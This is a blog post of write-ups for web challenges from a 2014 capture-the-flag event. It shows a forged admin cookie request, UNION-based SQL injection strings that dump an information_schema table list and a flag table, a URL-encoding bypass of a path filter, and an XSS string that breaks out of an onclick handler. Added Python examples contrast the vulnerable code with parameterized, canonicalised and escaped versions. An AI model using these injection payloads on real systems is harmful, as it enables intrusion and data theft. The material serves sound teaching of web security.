Monday, May 12, 2014

Hacktrick 2014 - ORION - Web Write-up

On this challenge we were supposed to log in as admin to a page on which we could register and then log in with our own credentials. First we looked for a guessable session ID, but there was none :(. Then we tried setting some cookies such as admin and isadmin. That did not work either. Then we got a hint that the server was using MongoDB, and after that everything was easy: we just made a NoSQLi request and became admin. To guess the username we used the registration system. The request made with netcat was this:

POST /index.php HTTP/1.1
Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: admin=true; isadmin=true; PHPSESSID=123 

After that we just refreshed the page :)

Hacktrick 2014 - Iron Throne - Web Write-up

This challenge was about SQLi. The system searched for the input we gave using a statement like this:
select * from X where Y like 'input%'
So we first used an input like this to gather the table names:
asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='
which ended up as the query:
select * from X where Y like 'asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='%'
and what we got was:
flag    2
news    2
So we pulled the rows from the table named flag like this:
asdf' union select *, 2 from flag where '1'='1' or 'a'='
which became:
select * from X where Y like 'asdf' union select *, 2 from flag where '1'='1' or 'a'='%'
and voila:
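To show why the input above turns into a second query, here is an added example (not code from the challenge or the write-up) that rebuilds the vulnerable LIKE search with sqlite3 and puts the parameterized version next to it. The table names news and flag, their columns and the rows are constructed; the challenge's real schema is not known.

```python
import sqlite3

# Constructed in-memory schema standing in for the challenge's "X" table and
# the "flag" table found through information_schema; names and rows are assumptions.
SCHEMA = """
CREATE TABLE news (title TEXT, body TEXT);
INSERT INTO news VALUES ('asdfgh', 'first post');
INSERT INTO news VALUES ('hello', 'second post');
CREATE TABLE flag (flag TEXT);
INSERT INTO flag VALUES ('FLAG{constructed-sample}');
"""

# Same shape as the write-up's input: close the literal, UNION in our own SELECT,
# and swallow the server's trailing %' with the dangling 'a'=' comparison.
UNION_INPUT = "asdf' union select flag, 2 from flag where '1'='1' or 'a'='"


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def search_vulnerable(db, user_input):
    # String concatenation: the quote in user_input ends the literal and the
    # rest of the input is parsed as SQL.
    sql = "select * from news where title like '" + user_input + "%'"
    return db.execute(sql).fetchall()


def search_parameterized(db, user_input):
    # A bound parameter is always a value, never statement text; the wildcard
    # is appended to the value, not to the SQL string.
    sql = "select * from news where title like ?"
    return db.execute(sql, (user_input + "%",)).fetchall()


def search_parameterized_escaped(db, user_input):
    # Additionally neutralise LIKE wildcards in the input so a bare '%' or '_'
    # cannot be used to match every row.
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    sql = "select * from news where title like ? escape '\\'"
    return db.execute(sql, (escaped + "%",)).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable:", search_vulnerable(db, UNION_INPUT))
    print("parameterized:", search_parameterized(db, UNION_INPUT))
```

Run against the same input, the concatenated query returns the flag row while the parameterized query treats the whole string as a search term and returns nothing. sqlite3 has no information_schema, so the example selects from the flag table directly; the mechanism is identical to the MySQL case in the write-up.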

Hacktrick 2014 - Fuel - Web Write-up

On this quest we needed to reach a URL on the server, but iptables was set up to prevent anyone from reaching it, so the aim was to bypass that rule. The hint pointed to a tool called 'fragroute', but we could not make it work, so we started looking for new ways and asked ourselves: why not URL-encode the path?

We sent a request like this with netcat:
nc 80
GET /%61dministrator.html
and received:
<!DOCTYPE html>
Key : G1mm3fu3lG1mm3fir3
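The bypass works because a byte-matching rule in front of the web server never sees the path the way the web server does. As an added example (not part of the write-up, and not how the challenge's firewall was configured), the function below canonicalises a request-target the way an application-layer check should, repeatedly percent-decoding and normalising dot segments before comparing; the blocked path /administrator.html is an assumption based on the request above, and naive_is_blocked stands in for a raw substring rule.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumption: the resource the filter rule was meant to protect.
BLOCKED_PATHS = {"/administrator.html"}


def canonical_path(raw_target):
    """Reduce a request-target to the path the server would actually serve."""
    path = urlsplit(raw_target).path or "/"
    # Decode repeatedly so double encoding (%2561 -> %61 -> a) is undone too;
    # stop as soon as another pass changes nothing.
    for _ in range(5):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Collapse ./ and ../ segments and duplicate slashes.
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path


def is_blocked(raw_target):
    """Application-layer check: compare after canonicalisation."""
    return canonical_path(raw_target) in BLOCKED_PATHS


def naive_is_blocked(raw_target):
    """What a plain byte/substring match on the request does (the bypassable check)."""
    return any(p in raw_target for p in BLOCKED_PATHS)


if __name__ == "__main__":
    for target in ["/administrator.html", "/%61dministrator.html", "/%2561dministrator.html"]:
        print(target, "naive:", naive_is_blocked(target), "canonical:", is_blocked(target))
```

The substring rule catches only the literal spelling, while the canonicalised comparison also catches the %61 form, double-encoded forms and /foo/../administrator.html. The broader lesson is that access control belongs where the decoded path is known, not in a packet filter looking at raw bytes.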

Hacktrick 2014 - KHALEESI - Web Write-up

On this challenge we were given a page with Khaleesi on it :D The exact page source code:

And the image of course :D :

As you can see from the source code, we were given obfuscated JavaScript code. First we decoded the first array and came up with these strings:
0 Yea I know I'm so hot and that can be cause lack of attention<3
1 log
2 Oh my dragons! My beautiful dragons...
3 abcdef1234567890
4 flag
5 U2FsdGVkX1/d+AKV6nrvKw0mwepr2/LIeS0sW4EveGKEv4cinrxne8MiSUEozt3DAYt25i1u7m4=
6 setItem
7 use strict
8 Missing secret!
9 secret
10 stringify
11 encrypt
12 TripleDES
13 decrypt
14 enc
15 parse
16 prototype
17 getItem
18 localStorage
19 remove
20 removeItem
21 -
22 split
23 substring
24 hash
25 Flag:
26 get
Then we followed the code to the end. Near the end you will see some if checks and an alert using the 25th element of the array, which is the flag! So we met the conditions required by the if statements and built the link like this:

and there comes the flag:

Hacktrick 2014 - Domify - Web Write-up

In this problem the server used the URL we gave it directly in the onclick event of a hyperlink, which left a great XSS vuln.

The onclick event was something like this:
<a href="#" onclick="someRedirectFunc('1337', 'index.php?click=');">

So I changed the link into this: ');window.stop();alert('sex

and then the event changed into something bad, very very bad :P :
<a href="#" onclick="someRedirectFunc('1337', 'index.php?click=');window.stop();alert('sex');">

The aim was to make the payload work in as many browsers as possible. Most browsers were redirecting before or after the alert, so we put in 'window.stop();' to stop the redirection, but newer versions of IE have something called 'XSS Filter', which turned every parenthesis in the URL into #. We did not bypass the filter, but learned that there is a way to get past that kind of filtering by using data URIs.
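The bug is a missing output encoding for a value that sits in two contexts at once: a JavaScript string literal inside an HTML attribute. As an added example (not the challenge's code; someRedirectFunc and the markup are taken from the write-up, the rendering functions are assumptions), the snippet below reproduces the vulnerable interpolation and puts the context-correct encoding next to it: JSON-encode the value into a JS string literal, then HTML-escape the whole attribute value.

```python
import html
import json

# The input from the write-up that broke out of the string literal.
PAYLOAD = "');window.stop();alert('sex"


def render_link_vulnerable(click_target):
    # Raw interpolation into a JS string inside an HTML attribute.
    return ('<a href="#" onclick="someRedirectFunc(\'1337\', '
            "'index.php?click=" + click_target + "');\">")


def js_string_literal(value):
    # json.dumps yields a valid, double-quoted JS string literal with quotes and
    # backslashes escaped; additionally escape characters the HTML parser cares
    # about so the same literal is also safe inside a <script> block.
    s = json.dumps(value)
    return (s.replace("<", "\\u003c")
             .replace(">", "\\u003e")
             .replace("&", "\\u0026"))


def render_link_hardened(click_target):
    js_call = ("someRedirectFunc('1337', "
               + js_string_literal("index.php?click=" + click_target) + ");")
    # The browser decodes attribute entities before handing the text to the JS
    # parser, so escaping the attribute as a whole keeps both layers intact.
    return '<a href="#" onclick="' + html.escape(js_call, quote=True) + '">'


def onclick_as_seen_by_js(rendered):
    # Pull the onclick attribute out and undo the HTML entity layer: this is the
    # text the JS engine actually receives.
    attr = rendered.split('onclick="', 1)[1].rsplit('">', 1)[0]
    return html.unescape(attr)


if __name__ == "__main__":
    print(render_link_vulnerable(PAYLOAD))
    print(render_link_hardened(PAYLOAD))
    print(onclick_as_seen_by_js(render_link_hardened(PAYLOAD)))
```

With the payload from the write-up, the vulnerable renderer produces exactly the markup shown above, while the hardened one hands the JS engine a single string literal that merely contains the quotes and parentheses. A cleaner design again avoids the double context entirely: put the target in a data attribute or a plain href and attach the handler from script.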